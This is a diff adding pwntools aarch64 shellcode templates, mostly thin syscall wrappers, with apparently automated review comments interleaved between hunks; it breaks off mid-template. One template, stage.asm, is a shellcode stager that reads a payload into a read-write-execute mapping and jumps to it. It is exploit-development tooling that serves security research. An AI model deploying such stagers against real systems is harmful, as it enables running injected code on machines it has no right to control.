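Review bot: `${syscall('SYS_rmdir', path)}` in rmdir.asm depends on a syscall the arm64 table does not define; directory removal there goes through `unlinkat` with `AT_REMOVEDIR`. Unless the aarch64 constants module provides `SYS_rmdir`, the template should emit `${syscall('SYS_unlinkat', 'AT_FDCWD', path, 'AT_REMOVEDIR')}`, which is the glibc implementation on this arch.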
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..718fae5bc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm new file mode 100644 index 000000000..4e44be153 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm new file mode 100644 index 000000000..4f9591fa1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm new file mode 100644 index 000000000..3799626af --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..86dcba489 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm new file mode 100644 index 000000000..9cb011c50 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm new file mode 100644 index 000000000..903a90822 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm new file mode 100644 index 000000000..5b1075cb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm new file mode 100644 index 000000000..1387fe0a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/select.asm b/pwnlib/shellcraft/templates/aarch64/linux/select.asm new file mode 100644 index 000000000..30d3e0159 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/select.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm b/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm new file mode 100644 index 000000000..13a3af4bd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm b/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm new file mode 100644 index 000000000..3ecc7d5db --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm b/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm new file mode 100644 index 000000000..dbde769ab --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm 
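Review bot: `${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)}` in select.asm names a syscall that is absent from the arm64 table, where only `pselect6` exists; the constant will presumably not resolve unless the aarch64 constants module aliases it. Mapping it is not a pure rename, since `pselect6` takes a `struct timespec *` (not `timeval`) plus a sixth sigmask argument, so either the template converts the timeout and passes `0` for the sigmask, or the docstring should say the template is not usable on aarch64 as generated. The `sendfile64` template on this same line has the mirror-image problem: it is a 32-bit-only syscall name, and on this arch plain `sendfile` already takes a 64-bit offset.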
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm new file mode 100644 index 000000000..2da0fd529 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm b/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm new file mode 100644 index 000000000..346434514 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm b/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm new file mode 100644 index 000000000..d14f1efdb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm b/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm new file mode 100644 index 000000000..56737099a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm new file mode 100644 index 000000000..5715115cc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm b/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm new file mode 100644 index 000000000..200f81b44 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm new file mode 100644 index 000000000..a5dcc5e10 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm new file mode 100644 index 000000000..f4e893ddc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm new file mode 100644 index 000000000..1d2dde056 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm new file mode 100644 index 000000000..f23cdfc1b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm new file mode 100644 index 000000000..4cf537740 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm new file mode 100644 index 000000000..178a7c20f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm new file mode 100644 index 000000000..48e14b1b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} + diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..09f3bcd3f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import setsockopt + from pwnlib.shellcraft.aarch64 import mov + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt with specified timeout. See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + eor x4, x4, x4 + ${mov('x3', secs)} + stp x3, x4, [sp, #-16]! + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'sp', 16)} + diff --git a/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm b/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm new file mode 100644 index 000000000..22ae97d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm new file mode 100644 index 000000000..93f224f04 --- /dev/null 
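Review bot: `stp x3, x4, [sp, #-16]!` in setsockopt_timeout pushes the 16-byte timeval (tv_sec = secs, tv_usec = 0 via `eor x4, x4, x4`) that setsockopt reads through `'sp'`, but nothing pops it afterwards, so every use of this template permanently lowers sp by 16; either add `add sp, sp, #16` after the `${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'sp', 16)}` line or state the stack effect in the docstring. The `<%` block imports `SOL_SOCKET` and `SO_RCVTIMEO` but the call passes the string names `'SOL_SOCKET'` and `'SO_RCVTIMEO'`, so the imports are dead and can be dropped unless the constant objects were meant to be passed directly. The docstring's `secs(int): secs` should say the value lands in tv_sec with tv_usec forced to zero, that x3/x4 are clobbered, and that only the receive timeout (SO_RCVTIMEO) is set.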
+++ b/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm new file mode 100644 index 000000000..1eefcf60a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm new file mode 100644 index 000000000..65b063fb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/signal.asm b/pwnlib/shellcraft/templates/aarch64/linux/signal.asm new file mode 100644 index 000000000..a392b7dea --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm new file mode 100644 index 000000000..88600d93d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm new file mode 100644 index 000000000..b6f751e4a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="how, set, oset, sigsetsize"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + sigsetsize(size_t): sigsetsize + + + ${syscall('SYS_rt_sigprocmask', how, set, oset, sigsetsize)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm new file mode 100644 index 000000000..4e48522f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm new file mode 100644 index 000000000..623b1a342 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/socket.asm b/pwnlib/shellcraft/templates/aarch64/linux/socket.asm new file mode 100644 index 000000000..a444de78f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/socket.asm @@ -0,0 +1,16 @@ +<% from pwnlib.shellcraft import aarch64 %> +<% from pwnlib.util.net import sockaddr %> +<% from pwnlib.constants import SOCK_STREAM, SOCK_DGRAM, SYS_socket %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network) + socktype = { + 'tcp': SOCK_STREAM, + 'udp': SOCK_DGRAM + }.get(proto, proto) +%>\ + /* open new socket */ + ${aarch64.linux.syscall(SYS_socket, address_family, socktype, 0)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/splice.asm b/pwnlib/shellcraft/templates/aarch64/linux/splice.asm new file mode 100644 index 000000000..12d66427f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stage.asm b/pwnlib/shellcraft/templates/aarch64/linux/stage.asm new file mode 100644 index 000000000..b80a4f6fe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stage.asm 
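Review bot: In socket.asm, `sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network)` rebinds the imported `sockaddr` helper to the bytes it returned, and neither `sockaddr` nor `length` is used afterwards; `_, _, address_family = sockaddr('127.0.0.1', 1, network)` says what is actually wanted and avoids the shadowing. The docstring is a bare "Creates a new socket" while every generated template in this series carries an Arguments section; it should list `network` (passed to `sockaddr`, so whatever names that helper accepts) and `proto` ('tcp'/'udp', any other value being passed through unchanged as the socket type via the `.get(proto, proto)` fallback). The splice hunk that follows names a parameter `len`, which shadows the builtin inside the template namespace; harmless here, but see the symlink note for the keyword case that is not.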
@@ -0,0 +1,61 @@ +<% +from pwnlib.shellcraft.aarch64 import mov +from pwnlib.shellcraft.aarch64.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'sp', 8)} + ldr x2, [sp] +%else: + ${mov('x2', length)} + str x2, [sp] +%endif + + /* Page-align, assume <4GB */ + lsr x2, x2, #12 + add x2, x2, #1 + lsl x2, x2, #12 + + /* Map it */ + ${mmap(0, 'x2', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + ldr x4, [sp] + + /* Save the memory address */ + str x0, [sp] + + /* Read in all of the data */ + ${readn(fd, 'x0', 'x4')} + + /* Go to shellcode */ + ldr x30, [sp] + ret diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stat.asm b/pwnlib/shellcraft/templates/aarch64/linux/stat.asm new file mode 100644 index 000000000..6408c55cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm new file mode 100644 index 000000000..5ffef90f2 
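Review bot: In stage.asm the 8-byte length header is fetched with a single `${read(fd, 'sp', 8)}` (presumably one read syscall, given that `readn` exists as a separate helper) while the payload below uses `readn`, so a short read on a pipe or socket leaves a partial value in `[sp]` and `ldr x2, [sp]` then maps and reads a garbage-sized buffer; `${readn(fd, 'sp', 8)}` makes the header fetch as robust as the body fetch. The "Page-align, assume <4GB" sequence always adds a page even when x2 is already page-aligned, which is harmless but worth a word in that comment. The docstring should also state that the buffer is mapped `PROT_READ | PROT_WRITE | PROT_EXEC` and that control never returns from the final `ret` (x30 is loaded with the mapped address), since the RWX mapping and the non-returning jump are the two properties a caller most needs to know.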
--- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stime.asm b/pwnlib/shellcraft/templates/aarch64/linux/stime.asm new file mode 100644 index 000000000..cdf909312 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stty.asm b/pwnlib/shellcraft/templates/aarch64/linux/stty.asm new file mode 100644 index 000000000..5f5c981c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm new file mode 100644 index 000000000..7073693c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall 